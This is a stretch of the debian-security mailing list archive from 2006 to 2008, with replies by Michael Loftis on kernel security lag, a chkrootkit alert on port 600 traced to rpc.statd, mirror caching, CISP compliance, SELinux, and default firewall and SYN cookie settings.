with a subject of "unsubscribe". Trouble? Contact
[EMAIL PROTECTED]







--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Debian Kernel security status?

2006-04-19 Thread Michael Loftis 



--On April 19, 2006 4:50:27 PM +0200 Jan Luehr 
<[EMAIL PROTECTED]> wrote:



Hello,

looking at the recent vanilla changes, there seem to be a rather rapid
development at the moment ;-) and I've to confess, that I lost the
overview,  what sec-holes do affect debian and which don't.

I was frightend recently, then I noticed that 2.4.27 was fixing
somecve-2004  stuff other a month ago as well as 2.6.

Just take a look at CVE-2004-1017. It was fixed in red hat in january
2005 and  fixed in debian in march 2006.

Therefore I suspect, that the debian kernel do have some security flaws,
fixed  in mainline kernel months ago. Am I wrong here?

This takes me to a difficult point:
- I can run 2.4 on my servers, what is considered to be depracted for
etch. - I can use the debian kernels and risk being compromised.
- I can say goodbye to linux and use Debian/kBSD
- I can use my own vanilla builds, building a new kernel every day.
(Looking  at the amount of patches since april 12th.)

Anyway, what do you recommend?
And is there any public status / shape information on the debian kernels?



Increasingly 2.6 is unsuitable for production use due to its huge amount of 
change and lack of stable tree.  There was a decision to do away with the 
old split development/odd numbered development model sometime after about 
2.6.11 so all hope of a stable 2.6 series is gone.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: INFECTED (PORTS: 600)

2006-05-18 Thread Michael Loftis 



--On May 18, 2006 9:17:09 AM -0400 Morgan Walker <[EMAIL PROTECTED]> wrote:




Hey guys,



Just new to this mailing list, hope you guys can help me out.  I was
testing out the chkrootkit package on one of my debian boxes.  After
running ‘chkrootkit –q’ I received the following output:


Use lsof and ps to find out who's running that proc and where from.  If 
root isn't running it then someone has a hacked binary that's trying to 
hide, if root is, and lsof indicates it's not /sbin/rpc.statd then you're 
owned.  It's kind of unusual for statd to show up on such a low port but 
not totally unheard of.






INFECTED (PORTS:  600)



I looked further into and narrowed down to this.  ‘netstat -naptu |
grep 600’ gave me the following ouput:



udp0  0 0.0.0.0:600 0.0.0.0:*
2120/rpc.statd



I have searched around on other mailing lists and forums, but could never
really get a definitive answer.  Is this a common message for chkrootkit,
should I be worried?  Any help would be great, thanks in advance.



~Morgan



Morgan Walker
Systems Administrator/Engineer
M•CAM, Inc.
Omni Business Center

210 Ridge-McIntire Rd., Suite 300

Charlottesville, VA 22903
434.979.7240 x311



http://www.m-cam.com
=
This message, including any attachments, is intended solely for the use
of the named recipient(s) and may contain confidential and/or
privileged information.  Any unauthorized review, use, disclosure or
distribution of this communication(s) is expressly prohibited.
If you are not the intended recipient, please contact the sender by
reply e-mail and destroy any and all copies of the original message.
Thank you.
=========






--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting

Re: security mirror out of date: 128.101.240.212

2007-05-14 Thread Michael Loftis 



--On May 15, 2007 12:14:28 AM +0300 Tomas Nykung <[EMAIL PROTECTED]> wrote:



PS
What I don't understand is why I always got the bad mirror, regardless
how many times I tried to rerun aptitude/apt-get update both yesterday
and today (and on two computers while the first one I upgraded did get
the upgrade without any problem).

The only way I could get the upgraded kernel version was to wget it
and install i by hand.

Not that I will lose any sleep because of this ;) but if someone have
time to shed some light on this I would be grateful.
DS


Random luck, or, probably as, or more likely, bad caching resolver that 
doesn't round-robin it's cached replies.


--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: CISP Compliance

2007-08-21 Thread Michael Loftis 

CISP compliance is more about policy and practices than about software.

--On August 20, 2007 6:14:36 PM -0500 Jonathan Wilson <[EMAIL PROTECTED]> wrote:


Sorry if this is the wrong place for this, but:

Does anyone know of a place I can get information on setting up CISP
(VISA  credit card) compliant Debian systems - or Linux in general, if
there's no  Debian-specific info. I've been searching the web for a
couple hours and I  don't know if I'm searching for the wrong phrases or
what, but I'm not  finding anything at all.

What I'm looking for is, essentially, what software needs to be installed
to  make a system storing and processing CC info CISP compliant, and what
settings need to be configured to match.

I'm just sure there's folks out there who's secured Debian systems and
installed & configured the necessary software for logging, auditing,
monitoring, etc. I just can't find anything about it - maybe I'm blind
today.

Thanks,

JW

--

--
System Administrator - Cedar Creek Software
http://www.cedarcreeksoftware.com http://jwadmin.blogspot.com


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact
[EMAIL PROTECTED]







--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Debian suggestion on File Deletion

2007-12-12 Thread Michael Loftis 



--On December 12, 2007 12:19:28 PM -0800 David de Hilario Richards 
<[EMAIL PROTECTED]> wrote:





Hello Debian OS developers,


I have a suggestion for the Debian Project:


The system/administration section of the OS is password protected. This
is a good protection against viruses etc that would attack the OS but
maybe the Debian developers could include password protecting Emptying
the Trash. So when you delete files, they would be sent to the Trash as
always but if you want to empty it, a user password would be necessary.
This would prevent harm from viruses even though I understand that Linux
has very few of them.

The same idea could be applied to the Terminal. The Terminal would ask
for a password every time you would want to delete a file.


To my knowledge, today the only way of protecting files in a similar way
is to create different user profiles with different permissions.


To actually do that requires a fundamental change in the way the kernel 
implements access controls.  SELinux can do these sorts of audits and 
preventions on a process by process basis.  So it's already there, you just 
need to deploy it and set it up to suit your needs/environment.





Hope you will take my suggestion into account.


Regards,
David




--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Why not have firewall rules by default?

2008-01-23 Thread Michael Loftis 



--On January 23, 2008 9:19:01 AM -0600 William Twomey 
<[EMAIL PROTECTED]> wrote:



It's my understanding (and experience) that a Debian system by default is
vulnerable to SYN flooding (at least when running services) and other
such mischeif. I was curious as to why tcp_syncookies (and similar
things) are not enabled by default.


There was atleast at some point I believe evidence that some 
platforms/firewalls didn't play well with SYN cookies.  I could be wrong.



Many distros (RPM-based mostly from my experience) ask you during the
install if you'd like to enable firewall protection. I was curious if
debian was every going to have this as an option?


There are so many different choices of firewall management packages. 
Shorewall is one I use, there are many others.  Some of which don't play 
well with extra things that some users may use like wondershaper.  Debian 
is still one of those distros that believes a little more in choice than 
just pushing things down the users throat.




One solution could be to have a folder called /etc/security/iptables that
contains files that get passed to iptables at startup (in the same way
/etc/rc2.d gets read in numeric order). So you could have files like
22ssh, 23ftp, etc. with iptable rules in each file. You could also have
an 'ENABLED' variable like some files in /etc/default have (so that ports
wouldn't be opened by default; the user would have to manually enable
them for the port to be opened).
 Then they'd just run /etc/init.d/iptables restart and the port would be
opened (flush the rules, reapply).


It's better to leave the service disabled, or even better, completely 
uninstalled from a security standpoint, and from a DoS standpoint as well. 
The Linux kernel isn't very efficient at processing firewall rules.  Newer 
kernels might be though (I honestly haven't looked as deeply into this in 
late 2.6 as i did/do in 2.4...2.4 processes firewall rules strictly step by 
step)




Even a central iptables-save format file that gets passed to iptables at
startup would be nice. It's easy enough to do manually, but would be nice
to see integrated with debian itself (packages managing their own rules,
etc.).


This much does exist.   invoke-rc.d iptables save --- i'm not sure what 
package the /etc/init.d/iptables script is in, seems to me like it was part 
of the same package that provided the binaries.



Is debian every going to introduce a better way of having iptables rules
be run at startup and easily saved/managed, or will this always be a
manual process?


Probably not, as, in the distro, there's at least one good firewall 
management utility, and probably more than one.  No need to reinvent the 
wheel.




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]